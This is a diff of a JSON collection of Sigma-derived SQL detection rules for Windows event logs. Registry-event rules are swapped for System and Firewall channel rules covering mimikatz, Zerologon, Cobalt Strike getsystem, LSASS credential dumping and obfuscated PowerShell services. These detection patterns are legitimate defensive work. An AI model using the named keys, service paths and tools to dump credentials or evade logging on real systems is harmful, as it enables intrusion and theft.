"falsepositives": [ - "Unknown" + "Any legitimate application that runs from the AppData user directory" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID IN ('12', '13', '14') AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND ((TargetObject LIKE 'HKLM\\\\SYSTEM\\\\CurrentControlSet\\\\Control\\\\MiniNt' ESCAPE '\\' AND EventType = 'CreateKey') OR NewName LIKE 'HKLM\\\\SYSTEM\\\\CurrentControlSet\\\\Control\\\\MiniNt' ESCAPE '\\'))" + "SELECT * FROM logs WHERE (Channel = 'Microsoft-Windows-Windows Firewall With Advanced Security/Firewall' AND ((EventID IN ('2004', '2071') AND (ApplicationPath LIKE '%\\\\AppData\\\\%' ESCAPE '\\' OR ApplicationPath LIKE '%\\\\Temp\\\\%' ESCAPE '\\')) AND NOT ((Action = '2'))) AND NOT ((ApplicationPath LIKE '%\\\\AppData\\\\local\\\\microsoft\\\\teams\\\\current\\\\teams.exe' ESCAPE '\\') OR (ApplicationPath LIKE '%\\\\AppData\\\\Local\\\\Keybase\\\\keybase.exe' ESCAPE '\\') OR (ApplicationPath LIKE '%\\\\AppData\\\\Local\\\\Programs\\\\Messenger\\\\Messenger.exe' ESCAPE '\\')))" ], - "filename": "registry_event_disable_security_events_logging_adding_reg_key_minint.yml" + "filename": "win_firewall_as_add_rule_susp_folder.yml" }, { - "title": "PrinterNightmare Mimimkatz Driver Name", - "id": "ba6b9e43-1d45-4d3c-a504-1043a64c8469", - "status": "test", - "description": "Detects static QMS 810 and mimikatz driver name used by Mimikatz as exploited in CVE-2021-1675 and CVE-2021-34527", - "author": "Markus Neis, @markus_neis, Florian Roth", + "title": "All Rules Have Been Deleted From The Windows Firewall Configuration", + "id": "79609c82-a488-426e-abcf-9f341a39365d", + "status": "experimental", + "description": "Detects when a all the rules have been deleted from the Windows Defender Firewall configuration", + "author": "frack113, Nasreddine Bencherchali (Nextron Systems)", + "level": "high", + "rule": [ + "SELECT * FROM logs WHERE (Channel = 'Microsoft-Windows-Windows Firewall With Advanced Security/Firewall' AND (EventID IN ('2033', '2059') AND NOT (((ModifyingApplication LIKE 'C:\\\\Program Files\\\\%' ESCAPE '\\' OR ModifyingApplication LIKE 'C:\\\\Program Files (x86)\\\\%' ESCAPE '\\')) OR (ModifyingApplication LIKE 'C:\\\\Windows\\\\System32\\\\svchost.exe' ESCAPE '\\'))) AND NOT ((ModifyingApplication LIKE 'C:\\\\ProgramData\\\\Microsoft\\\\Windows Defender\\\\Platform\\\\%' ESCAPE '\\' AND ModifyingApplication LIKE '%\\\\MsMpEng.exe' ESCAPE '\\')))" + ], + "filename": "win_firewall_as_delete_all_rules.yml" + }, + { + "title": "Sysmon Crash", + "id": "4d7f1827-1637-4def-8d8a-fd254f9454df", + "status": "experimental", + "description": "Detects application popup reporting a failure of the Sysmon service", + "author": "Tim Shelton", "tags": [ - "attack.execution", - "attack.t1204", - "cve.2021.1675", - "cve.2021.34527" + "attack.defense_evasion", + "attack.t1562" ], "falsepositives": [ - "Legitimate installation of printer driver QMS 810, Texas Instruments microLaser printer (unlikely)" + "Unknown" ], - "level": "critical", + "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID IN ('12', '13', '14') AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (((TargetObject LIKE '%\\\\Control\\\\Print\\\\Environments\\\\Windows x64\\\\Drivers\\\\Version-3\\\\QMS 810\\\\%' ESCAPE '\\' OR TargetObject LIKE '%\\\\Control\\\\Print\\\\Environments\\\\Windows x64\\\\Drivers\\\\Version-3\\\\mimikatz%' ESCAPE '\\') OR (TargetObject LIKE '%legitprinter%' ESCAPE '\\' AND TargetObject LIKE '%\\\\Control\\\\Print\\\\Environments\\\\Windows%' ESCAPE '\\')) OR ((TargetObject LIKE '%\\\\Control\\\\Print\\\\Environments%' ESCAPE '\\' OR TargetObject LIKE '%\\\\CurrentVersion\\\\Print\\\\Printers%' ESCAPE '\\') AND (TargetObject LIKE '%Gentil Kiwi%' ESCAPE '\\' OR TargetObject LIKE '%mimikatz printer%' ESCAPE '\\' OR TargetObject LIKE '%Kiwi Legit Printer%' ESCAPE '\\'))))" + "SELECT * FROM logs WHERE (Channel = 'System' AND Provider_Name = 'Application Popup' AND EventID = '26' AND Caption = 'sysmon64.exe - Application Error')" ], - "filename": "registry_event_mimikatz_printernightmare.yml" + "filename": "win_system_application_sysmon_crash.yml" }, { - "title": "DLL Load via LSASS", - "id": "b3503044-60ce-4bf4-bbcb-e3db98788823", - "status": "test", - "description": "Detects a method to load DLL via LSASS process using an undocumented Registry key", - "author": "Florian Roth (Nextron Systems)", + "title": "Important Windows Eventlog Cleared", + "id": "100ef69e-3327-481c-8e5c-6d80d9507556", + "status": "experimental", + "description": "Detects the clearing of one of the Windows Core Eventlogs. e.g. caused by \"wevtutil cl\" command execution", + "author": "Florian Roth (Nextron Systems), Tim Shelton", "tags": [ - "attack.execution", - "attack.persistence", - "attack.t1547.008" + "attack.defense_evasion", + "attack.t1070.001", + "car.2016-04-002" ], "falsepositives": [ - "Unknown" + "Rollout of log collection agents (the setup routine often includes a reset of the local Eventlog)", + "System provisioning (system reset before the golden image creation)" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID IN ('12', '13', '14') AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (TargetObject LIKE '%\\\\CurrentControlSet\\\\Services\\\\NTDS\\\\DirectoryServiceExtPt%' ESCAPE '\\' OR TargetObject LIKE '%\\\\CurrentControlSet\\\\Services\\\\NTDS\\\\LsaDbExtPt%' ESCAPE '\\') AND NOT ((Image LIKE 'C:\\\\Windows\\\\system32\\\\lsass.exe' ESCAPE '\\' AND (Details LIKE '\\%\\%systemroot\\%\\%\\\\system32\\\\ntdsa.dll' ESCAPE '\\' OR Details LIKE '\\%\\%systemroot\\%\\%\\\\system32\\\\lsadb.dll' ESCAPE '\\'))))" + "SELECT * FROM logs WHERE (Channel = 'System' AND EventID = '104' AND Provider_Name = 'Microsoft-Windows-Eventlog' AND Channel IN ('System', 'Security', 'Application'))" ], - "filename": "registry_event_susp_lsass_dll_load.yml" + "filename": "win_system_susp_eventlog_cleared.yml" }, { - "title": "Shell Open Registry Keys Manipulation", - "id": "152f3630-77c1-4284-bcc0-4cc68ab2f6e7", + "title": "DHCP Server Loaded the CallOut DLL", + "id": "13fc89a9-971e-4ca6-b9dc-aa53a445bf40", "status": "test", - "description": "Detects the shell open key manipulation (exefile and ms-settings) used for persistence and the pattern of UAC Bypass using fodhelper.exe, computerdefaults.exe, slui.exe via registry keys (e.g. UACMe 33 or 62)", - "author": "Christian Burkard (Nextron Systems)", + "description": "This rule detects a DHCP server in which a specified Callout DLL (in registry) was loaded", + "author": "Dimitrios Slamaris", "tags": [ "attack.defense_evasion", - "attack.privilege_escalation", - "attack.t1548.002", - "attack.t1546.001" + "attack.t1574.002" ], "falsepositives": [ "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID IN ('12', '13', '14') AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (((EventType = 'SetValue' AND TargetObject LIKE '%Classes\\\\ms-settings\\\\shell\\\\open\\\\command\\\\SymbolicLinkValue' ESCAPE '\\' AND Details LIKE '%\\\\Software\\\\Classes\\\\{%' ESCAPE '\\') OR TargetObject LIKE '%Classes\\\\ms-settings\\\\shell\\\\open\\\\command\\\\DelegateExecute' ESCAPE '\\') OR ((EventType = 'SetValue' AND (TargetObject LIKE '%Classes\\\\ms-settings\\\\shell\\\\open\\\\command\\\\(Default)' ESCAPE '\\' OR TargetObject LIKE '%Classes\\\\exefile\\\\shell\\\\open\\\\command\\\\(Default)' ESCAPE '\\')) AND NOT (Details = '(Empty)'))))" + "SELECT * FROM logs WHERE (Channel = 'System' AND EventID = '1033' AND Provider_Name = 'Microsoft-Windows-DHCP-Server')" ], - "filename": "registry_event_shell_open_keys_manipulation.yml" + "filename": "win_system_susp_dhcp_config.yml" }, { - "title": "Creation of a Local Hidden User Account by Registry", - "id": "460479f3-80b7-42da-9c43-2cc1d54dbccd", - "status": "experimental", - "description": "Sysmon registry detection of a local hidden user account.", - "author": "Christian Burkard (Nextron Systems)", + "title": "DHCP Server Error Failed Loading the CallOut DLL", + "id": "75edd3fd-7146-48e5-9848-3013d7f0282c", + "status": "test", + "description": "This rule detects a DHCP server error in which a specified Callout DLL (in registry) could not be loaded", + "author": "Dimitrios Slamaris, @atc_project (fix)", "tags": [ - "attack.persistence", - "attack.t1136.001" + "attack.defense_evasion", + "attack.t1574.002" ], "falsepositives": [ "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID IN ('12', '13', '14') AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND TargetObject LIKE '%\\\\SAM\\\\SAM\\\\Domains\\\\Account\\\\Users\\\\Names\\\\%' ESCAPE '\\' AND TargetObject LIKE '%$' ESCAPE '\\' AND Image LIKE '%\\\\lsass.exe' ESCAPE '\\')" + "SELECT * FROM logs WHERE (Channel = 'System' AND EventID IN ('1031', '1032', '1034') AND Provider_Name = 'Microsoft-Windows-DHCP-Server')" ], - "filename": "registry_event_add_local_hidden_user.yml" + "filename": "win_system_susp_dhcp_config_failed.yml" }, { - "title": "OilRig APT Registry Persistence", - "id": "7bdf2a7c-3acc-4091-9581-0a77dad1c5b5", + "title": "QuarksPwDump Clearing Access History", + "id": "39f919f3-980b-4e6f-a975-8af7e507ef2b", "status": "test", - "description": "Detects OilRig registry persistence as reported by Nyotron in their March 2018 report", - "author": "Florian Roth (Nextron Systems), Markus Neis, Jonhnathan Ribeiro, Daniil Yugoslavskiy, oscd.community", + "description": "Detects QuarksPwDump clearing access history in hive", + "author": "Florian Roth (Nextron Systems)", "tags": [ - "attack.persistence", - "attack.g0049", - "attack.t1053.005", - "attack.s0111", - "attack.t1543.003", - "attack.defense_evasion", - "attack.t1112", - "attack.command_and_control", - "attack.t1071.004" + "attack.credential_access", + "attack.t1003.002" ], "falsepositives": [ - "Unlikely" + "Unknown" ], "level": "critical", "rule": [ - "SELECT * FROM logs WHERE (EventID IN ('12', '13', '14') AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND (TargetObject LIKE '%SOFTWARE\\\\Microsoft\\\\Windows\\\\CurrentVersion\\\\UMe' ESCAPE '\\' OR TargetObject LIKE '%SOFTWARE\\\\Microsoft\\\\Windows\\\\CurrentVersion\\\\UT' ESCAPE '\\'))" + "SELECT * FROM logs WHERE (Channel = 'System' AND EventID = '16' AND Provider_Name = 'Microsoft-Windows-Kernel-General' AND HiveName LIKE '%\\\\AppData\\\\Local\\\\Temp\\\\SAM%' ESCAPE '\\' AND HiveName LIKE '%.dmp' ESCAPE '\\')" ], - "filename": "registry_event_apt_oilrig_mar18.yml" + "filename": "win_system_quarkspwdump_clearing_hive_access_history.yml" }, { - "title": "Potential Credential Dumping Via LSASS SilentProcessExit Technique", - "id": "55e29995-75e7-451a-bef0-6225e2f13597", - "status": "experimental", - "description": "Detects changes to the Registry in which a monitor program gets registered to dump the memory of the lsass.exe process", - "author": "Florian Roth (Nextron Systems)", + "title": "Zerologon Exploitation Using Well-known Tools", + "id": "18f37338-b9bd-4117-a039-280c81f7a596", + "status": "stable", + "description": "This rule is designed to detect attempts to exploit Zerologon (CVE-2020-1472) vulnerability using mimikatz zerologon module or other exploits from machine with \"kali\" hostname.", + "author": "Demyan Sokolin @_drd0c, Teymur Kheirkhabarov @HeirhabarovT, oscd.community", "tags": [ - "attack.credential_access", - "attack.t1003.001" - ], - "falsepositives": [ - "Unlikely" + "attack.t1210", + "attack.lateral_movement" ], "level": "critical", "rule": [ - "SELECT * FROM logs WHERE (EventID IN ('12', '13', '14') AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND TargetObject LIKE '%Microsoft\\\\Windows NT\\\\CurrentVersion\\\\SilentProcessExit\\\\lsass.exe%' ESCAPE '\\')" + "SELECT * FROM logs WHERE (Channel = 'System' AND EventID IN ('5805', '5723') AND (logs MATCH ('\"kali\" OR \"mimikatz\"')))" ], - "filename": "registry_event_silentprocessexit_lsass.yml" + "filename": "win_system_possible_zerologon_exploitation_using_wellknown_tools.yml" }, { - "title": "Windows Credential Editor Registry", - "id": "a6b33c02-8305-488f-8585-03cb2a7763f2", + "title": "Vulnerable Netlogon Secure Channel Connection Allowed", + "id": "a0cb7110-edf0-47a4-9177-541a4083128a", "status": "test", - "description": "Detects the use of Windows Credential Editor (WCE)", - "author": "Florian Roth (Nextron Systems)", + "description": "Detects that a vulnerable Netlogon secure channel connection was allowed, which could be an indicator of CVE-2020-1472.", + "author": "NVISO", "tags": [ - "attack.credential_access", - "attack.t1003.001", - "attack.s0005" + "attack.privilege_escalation", + "attack.t1548" ], "falsepositives": [ "Unknown" ], - "level": "critical", + "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID IN ('12', '13', '14') AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND TargetObject LIKE '%Services\\\\WCESERVICE\\\\Start%' ESCAPE '\\')" + "SELECT * FROM logs WHERE (Channel = 'System' AND Provider_Name = 'NetLogon' AND EventID = '5829')" ], - "filename": "registry_event_hack_wce_reg.yml" + "filename": "win_system_vul_cve_2020_1472.yml" }, { - "title": "Suspicious Camera and Microphone Access", - "id": "62120148-6b7a-42be-8b91-271c04e281a3", - "status": "test", - "description": "Detects Processes accessing the camera and microphone from suspicious folder", - "author": "Den Iuzvyk", + "title": "KDC RC4-HMAC Downgrade CVE-2022-37966", + "id": "e6f81941-b1cd-4766-87db-9fc156f658ee", + "status": "experimental", + "description": "Detects the exploitation of a security bypass and elevation of privilege vulnerability with Authentication Negotiation by using weak RC4-HMAC negotiation", + "author": "Florian Roth (Nextron Systems)", "tags": [ - "attack.collection", - "attack.t1125", - "attack.t1123" + "attack.privilege_escalation" ], "falsepositives": [ - "Unlikely, there could be conferencing software running from a Temp folder accessing the devices" + "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID IN ('12', '13', '14') AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND TargetObject LIKE '%\\\\Software\\\\Microsoft\\\\Windows\\\\CurrentVersion\\\\CapabilityAccessManager\\\\ConsentStore\\\\%' ESCAPE '\\' AND TargetObject LIKE '%\\\\NonPackaged%' ESCAPE '\\' AND (TargetObject LIKE '%microphone%' ESCAPE '\\' OR TargetObject LIKE '%webcam%' ESCAPE '\\') AND (TargetObject LIKE '%:#Windows#Temp#%' ESCAPE '\\' OR TargetObject LIKE '%:#$Recycle.bin#%' ESCAPE '\\' OR TargetObject LIKE '%:#Temp#%' ESCAPE '\\' OR TargetObject LIKE '%:#Users#Public#%' ESCAPE '\\' OR TargetObject LIKE '%:#Users#Default#%' ESCAPE '\\' OR TargetObject LIKE '%:#Users#Desktop#%' ESCAPE '\\'))" + "SELECT * FROM logs WHERE (Channel = 'System' AND EventID = '42' AND Provider_Name = 'Kerberos-Key-Distribution-Center' AND Level = '2')" ], - "filename": "registry_event_susp_mic_cam_access.yml" + "filename": "win_system_kdcsvc_rc4_downgrade.yml" }, { - "title": "NetNTLM Downgrade Attack - Registry", - "id": "d67572a0-e2ec-45d6-b8db-c100d14b8ef2", + "title": "NTFS Vulnerability Exploitation", + "id": "f14719ce-d3ab-4e25-9ce6-2899092260b0", "status": "test", - "description": "Detects NetNTLM downgrade attack", - "author": "Florian Roth (Nextron Systems), wagga", + "description": "This the exploitation of a NTFS vulnerability as reported without many details via Twitter", + "author": "Florian Roth (Nextron Systems)", "tags": [ - "attack.defense_evasion", - "attack.t1562.001", - "attack.t1112" + "attack.impact", + "attack.t1499.001" ], "falsepositives": [ - "Unknown" + "Unlikely" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID IN ('12', '13', '14') AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND TargetObject LIKE '%SYSTEM\\\\%' ESCAPE '\\' AND TargetObject LIKE '%ControlSet%' ESCAPE '\\' AND TargetObject LIKE '%\\\\Control\\\\Lsa%' ESCAPE '\\' AND (TargetObject LIKE '%\\\\lmcompatibilitylevel' ESCAPE '\\' OR TargetObject LIKE '%\\\\NtlmMinClientSec' ESCAPE '\\' OR TargetObject LIKE '%\\\\RestrictSendingNTLMTraffic' ESCAPE '\\'))" + "SELECT * FROM logs WHERE (Channel = 'System' AND Provider_Name = 'Ntfs' AND EventID = '55' AND Origin = 'File System Driver' AND Description LIKE '%contains a corrupted file record%' ESCAPE '\\' AND Description LIKE '%The name of the file is \"\\\\\"%' ESCAPE '\\')" ], - "filename": "registry_event_net_ntlm_downgrade.yml" + "filename": "win_system_ntfs_vuln_exploit.yml" }, { - "title": "FlowCloud Malware", - "id": "5118765f-6657-4ddb-a487-d7bd673abbf1", - "status": "test", - "description": "Detects FlowCloud malware from threat group TA410.", - "author": "NVISO", + "title": "Local Privilege Escalation Indicator TabTip", + "id": "bc2e25ed-b92b-4daa-b074-b502bdd1982b", + "status": "experimental", + "description": "Detects the invocation of TabTip via CLSID as seen when JuicyPotatoNG is used on a system in brute force mode", + "author": "Florian Roth (Nextron Systems)", "tags": [ - "attack.persistence", - "attack.t1112" + "attack.execution", + "attack.t1557.001" ], "falsepositives": [ "Unknown" ], - "level": "critical", + "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID IN ('12', '13', '14') AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND ((TargetObject LIKE 'HKLM\\\\HARDWARE\\\\{804423C2-F490-4ac3-BFA5-13DEDE63A71A}' ESCAPE '\\' OR TargetObject LIKE 'HKLM\\\\HARDWARE\\\\{A5124AF5-DF23-49bf-B0ED-A18ED3DEA027}' ESCAPE '\\' OR TargetObject LIKE 'HKLM\\\\HARDWARE\\\\{2DB80286-1784-48b5-A751-B6ED1F490303}' ESCAPE '\\') OR TargetObject LIKE 'HKLM\\\\SYSTEM\\\\Setup\\\\PrintResponsor\\\\%' ESCAPE '\\'))" + "SELECT * FROM logs WHERE (Channel = 'System' AND Provider_Name = 'Microsoft-Windows-DistributedCOM' AND EventID = '10001' AND param1 LIKE 'C:\\\\Program Files\\\\Common Files\\\\microsoft shared\\\\ink\\\\TabTip.exe' ESCAPE '\\' AND param2 = '2147943140' AND param3 = '{054AAE20-4BEA-4347-8A35-64A533254A9D}')" ], - "filename": "registry_event_mal_flowcloud.yml" + "filename": "win_system_lpe_indicators_tabtip.yml" }, { - "title": "Potential Qakbot Registry Activity", - "id": "1c8e96cd-2bed-487d-9de0-b46c90cade56", + "title": "Service Installed By Unusual Client - System", + "id": "71c276aa-49cd-43d2-b920-2dcd3e6962d5", "status": "experimental", - "description": "Detects a registry key used by IceID in a campaign that distributes malicious OneNote files", - "author": "Hieu Tran", + "description": "Detects a service installed by a client which has PID 0 or whose parent has PID 0", + "author": "Tim Rauch", "tags": [ - "attack.defense_evasion", - "attack.t1112" + "attack.privilege_escalation", + "attack.t1543" ], "falsepositives": [ "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID IN ('12', '13', '14') AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND TargetObject LIKE '%\\\\Software\\\\firm\\\\soft\\\\Name' ESCAPE '\\')" + "SELECT * FROM logs WHERE (Channel = 'System' AND Provider_Name = 'Service Control Manager' AND EventID = '7045' AND ProcessId = '0')" ], - "filename": "registry_event_malware_qakbot_registry.yml" + "filename": "win_system_system_service_installation_by_unusal_client.yml" }, { - "title": "Esentutl Volume Shadow Copy Service Keys", - "id": "5aad0995-46ab-41bd-a9ff-724f41114971", - "status": "test", - "description": "Detects the volume shadow copy service initialization and processing via esentutl. Registry keys such as HKLM\\\\System\\\\CurrentControlSet\\\\Services\\\\VSS\\\\Diag\\\\VolSnap\\\\Volume are captured.", - "author": "Roberto Rodriguez (Cyb3rWard0g), OTR (Open Threat Research)", + "title": "Moriya Rootkit - System", + "id": "25b9c01c-350d-4b95-bed1-836d04a4f324", + "status": "experimental", + "description": "Detects the use of Moriya rootkit as described in the securelist's Operation TunnelSnake report", + "author": "Bhabesh Raj", "tags": [ - "attack.credential_access", - "attack.t1003.002" + "attack.persistence", + "attack.privilege_escalation", + "attack.t1543.003" ], "falsepositives": [ "Unknown" ], - "level": "high", + "level": "critical", "rule": [ - "SELECT * FROM logs WHERE ((EventID IN ('12', '13', '14') AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (TargetObject LIKE '%System\\\\CurrentControlSet\\\\Services\\\\VSS%' ESCAPE '\\' AND Image LIKE '%esentutl.exe' ESCAPE '\\') AND NOT (TargetObject LIKE '%System\\\\CurrentControlSet\\\\Services\\\\VSS\\\\Start%' ESCAPE '\\'))" + "SELECT * FROM logs WHERE (Channel = 'System' AND Provider_Name = 'Service Control Manager' AND EventID = '7045' AND ServiceName = 'ZzNetSvc')" ], - "filename": "registry_event_esentutl_volume_shadow_copy_service_keys.yml" + "filename": "win_system_moriya_rootkit.yml" }, { - "title": "OceanLotus Registry Activity", - "id": "4ac5fc44-a601-4c06-955b-309df8c4e9d4", - "status": "test", - "description": "Detects registry keys created in OceanLotus (also known as APT32) attacks", - "author": "megan201296, Jonhnathan Ribeiro", + "title": "Meterpreter or Cobalt Strike Getsystem Service Installation - System", + "id": "843544a7-56e0-4dcc-a44f-5cc266dd97d6", + "status": "experimental", + "description": "Detects the use of getsystem Meterpreter/Cobalt Strike command by detecting a specific service installation", + "author": "Teymur Kheirkhabarov, Ecco, Florian Roth", "tags": [ - "attack.defense_evasion", - "attack.t1112" + "attack.privilege_escalation", + "attack.t1134.001", + "attack.t1134.002" ], "falsepositives": [ - "Unknown" + "Highly unlikely" ], "level": "critical", "rule": [ - "SELECT * FROM logs WHERE ((EventID IN ('12', '13', '14') AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (TargetObject LIKE 'HKCU\\\\SOFTWARE\\\\Classes\\\\CLSID\\\\{E08A0F4B-1F65-4D4D-9A09-BD4625B9C5A1}\\\\Model' ESCAPE '\\' OR ((TargetObject LIKE 'HKCU\\\\SOFTWARE\\\\App\\\\%' ESCAPE '\\' OR TargetObject LIKE 'HKLM\\\\SOFTWARE\\\\App\\\\%' ESCAPE '\\') AND (TargetObject LIKE '%AppXbf13d4ea2945444d8b13e2121cb6b663\\\\%' ESCAPE '\\' OR TargetObject LIKE '%AppX70162486c7554f7f80f481985d67586d\\\\%' ESCAPE '\\' OR TargetObject LIKE '%AppX37cc7fdccd644b4f85f4b22d5a3f105a\\\\%' ESCAPE '\\') AND (TargetObject LIKE '%Application' ESCAPE '\\' OR TargetObject LIKE '%DefaultIcon' ESCAPE '\\')) OR (TargetObject LIKE 'HKCU\\\\%' ESCAPE '\\' AND (TargetObject LIKE '%Classes\\\\AppXc52346ec40fb4061ad96be0e6cb7d16a\\\\%' ESCAPE '\\' OR TargetObject LIKE '%Classes\\\\AppX3bbba44c6cae4d9695755183472171e2\\\\%' ESCAPE '\\' OR TargetObject LIKE '%Classes\\\\CLSID\\\\{E3517E26-8E93-458D-A6DF-8030BC80528B}\\\\%' ESCAPE '\\' OR TargetObject LIKE '%Classes\\\\CLSID\\\\{E08A0F4B-1F65-4D4D-9A09-BD4625B9C5A1}\\\\Model%' ESCAPE '\\'))))" + "SELECT * FROM logs WHERE (Channel = 'System' AND (Provider_Name = 'Service Control Manager' AND EventID = '7045') AND ((ImagePath LIKE '%cmd%' ESCAPE '\\' AND ImagePath LIKE '%/c%' ESCAPE '\\' AND ImagePath LIKE '%echo%' ESCAPE '\\' AND ImagePath LIKE '%\\\\pipe\\\\%' ESCAPE '\\') OR (ImagePath LIKE '%\\%COMSPEC\\%%' ESCAPE '\\' AND ImagePath LIKE '%/c%' ESCAPE '\\' AND ImagePath LIKE '%echo%' ESCAPE '\\' AND ImagePath LIKE '%\\\\pipe\\\\%' ESCAPE '\\') OR (ImagePath LIKE '%cmd.exe%' ESCAPE '\\' AND ImagePath LIKE '%/c%' ESCAPE '\\' AND ImagePath LIKE '%echo%' ESCAPE '\\' AND ImagePath LIKE '%\\\\pipe\\\\%' ESCAPE '\\') OR (ImagePath LIKE '%rundll32%' ESCAPE '\\' AND ImagePath LIKE '%.dll,a%' ESCAPE '\\' AND ImagePath LIKE '%/p:%' ESCAPE '\\') OR ImagePath LIKE '\\\\\\\\127.0.0.1\\\\ADMIN$\\\\%' ESCAPE '\\'))" ], - "filename": "registry_event_apt_oceanlotus_registry.yml" + "filename": "win_system_meterpreter_or_cobaltstrike_getsystem_service_installation.yml" }, { - "title": "Suspicious Run Key from Download", - "id": "9c5037d1-c568-49b3-88c7-9846a5bdc2be", - "status": "test", - "description": "Detects the suspicious RUN keys created by software located in Download or temporary Outlook/Internet Explorer directories", - "author": "Florian Roth (Nextron Systems)", + "title": "Invoke-Obfuscation STDIN+ Launcher - System", + "id": "72862bf2-0eb1-11eb-adc1-0242ac120002", + "status": "experimental", + "description": "Detects Obfuscated use of stdin to execute PowerShell", + "author": "Jonathan Cheong, oscd.community", "tags": [ - "attack.persistence", - "attack.t1547.001" + "attack.defense_evasion", + "attack.t1027", + "attack.execution", + "attack.t1059.001" ], "falsepositives": [ - "Software installers downloaded and used by users" + "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID IN ('12', '13', '14') AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND (Image LIKE '%\\\\Downloads\\\\%' ESCAPE '\\' OR Image LIKE '%\\\\Temporary Internet Files\\\\Content.Outlook\\\\%' ESCAPE '\\' OR Image LIKE '%\\\\Local Settings\\\\Temporary Internet Files\\\\%' ESCAPE '\\') AND TargetObject LIKE '%\\\\SOFTWARE\\\\Microsoft\\\\Windows\\\\CurrentVersion\\\\Run\\\\%' ESCAPE '\\')" + "SELECT * FROM logs WHERE (Channel = 'System' AND (Provider_Name = 'Service Control Manager' AND EventID = '7045' AND ImagePath LIKE '%cmd%' ESCAPE '\\' AND ImagePath LIKE '%powershell%' ESCAPE '\\' AND (ImagePath LIKE '%/c%' ESCAPE '\\' OR ImagePath LIKE '%/r%' ESCAPE '\\')) AND (ImagePath LIKE '%noexit%' ESCAPE '\\' OR (ImagePath LIKE '%input%' ESCAPE '\\' AND ImagePath LIKE '%$%' ESCAPE '\\')))" ], - "filename": "registry_event_susp_download_run_key.yml" + "filename": "win_system_invoke_obfuscation_stdin_services.yml" }, { - "title": "Narrator's Feedback-Hub Persistence", - "id": "f663a6d9-9d1b-49b8-b2b1-0637914d199a", - "status": "test", - "description": "Detects abusing Windows 10 Narrator's Feedback-Hub", - "author": "Dmitriy Lifanov, oscd.community", + "title": "New Service Uses Double Ampersand in Path", + "id": "ca83e9f3-657a-45d0-88d6-c1ac280caf53", + "status": "experimental", + "description": "Detects a service installation that uses a suspicious double ampersand used in the image path value", + "author": "Florian Roth (Nextron Systems)", "tags": [ - "attack.persistence", - "attack.t1547.001" + "attack.defense_evasion", + "attack.t1027" ], "falsepositives": [ "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID IN ('12', '13', '14') AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND ((EventType = 'DeleteValue' AND TargetObject LIKE '%\\\\AppXypsaf9f1qserqevf0sws76dx4k9a5206\\\\Shell\\\\open\\\\command\\\\DelegateExecute' ESCAPE '\\') OR TargetObject LIKE '%\\\\AppXypsaf9f1qserqevf0sws76dx4k9a5206\\\\Shell\\\\open\\\\command\\\\(Default)' ESCAPE '\\'))" + "SELECT * FROM logs WHERE (Channel = 'System' AND Provider_Name = 'Service Control Manager' AND EventID = '7045' AND ImagePath LIKE '%&&%' ESCAPE '\\')" ], - "filename": "registry_event_narrator_feedback_persistance.yml" + "filename": "win_system_service_install_susp_double_ampersand.yml" }, { - "title": "Pandemic Registry Key", - "id": "47e0852a-cf81-4494-a8e6-31864f8c86ed", - "status": "test", - "description": "Detects Pandemic Windows Implant", - "author": "Florian Roth (Nextron Systems)", + "title": "Invoke-Obfuscation Via Use Clip - System", + "id": "63e3365d-4824-42d8-8b82-e56810fefa0c", + "status": "experimental", + "description": "Detects Obfuscated Powershell via use Clip.exe in Scripts", + "author": "Nikita Nazarov, oscd.community", "tags": [ - "attack.lateral_movement", - "attack.t1105" + "attack.defense_evasion", + "attack.t1027", + "attack.execution", + "attack.t1059.001" ], "falsepositives": [ "Unknown" ], - "level": "critical", + "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID IN ('12', '13', '14') AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND TargetObject LIKE '%\\\\SYSTEM\\\\CurrentControlSet\\\\services\\\\null\\\\Instance%' ESCAPE '\\')" + "SELECT * FROM logs WHERE (Channel = 'System' AND Provider_Name = 'Service Control Manager' AND EventID = '7045' AND ImagePath LIKE '%(Clipboard|i%' ESCAPE '\\')" ], - "filename": "registry_event_apt_pandemic.yml" + "filename": "win_system_invoke_obfuscation_via_use_clip_services.yml" }, { - "title": "Wdigest CredGuard Registry Modification", - "id": "1a2d6c47-75b0-45bd-b133-2c0be75349fd", - "status": "test", - "description": "Detects potential malicious modification of the property value of IsCredGuardEnabled from\nHKLM:\\SYSTEM\\CurrentControlSet\\Control\\SecurityProviders\\WDigest to disable Cred Guard on a system.\nThis is usually used with UseLogonCredential to manipulate the caching credentials.\n", - "author": "Roberto Rodriguez (Cyb3rWard0g), OTR (Open Threat Research)", + "title": "Invoke-Obfuscation Via Use MSHTA - System", + "id": "7e9c7999-0f9b-4d4a-a6ed-af6d553d4af4", + "status": "experimental", + "description": "Detects Obfuscated Powershell via use MSHTA in Scripts", + "author": "Nikita Nazarov, oscd.community", "tags": [ "attack.defense_evasion", - "attack.t1112" + "attack.t1027", + "attack.execution", + "attack.t1059.001" ], "falsepositives": [ "Unknown" ], "level": "high", "rule": [ - 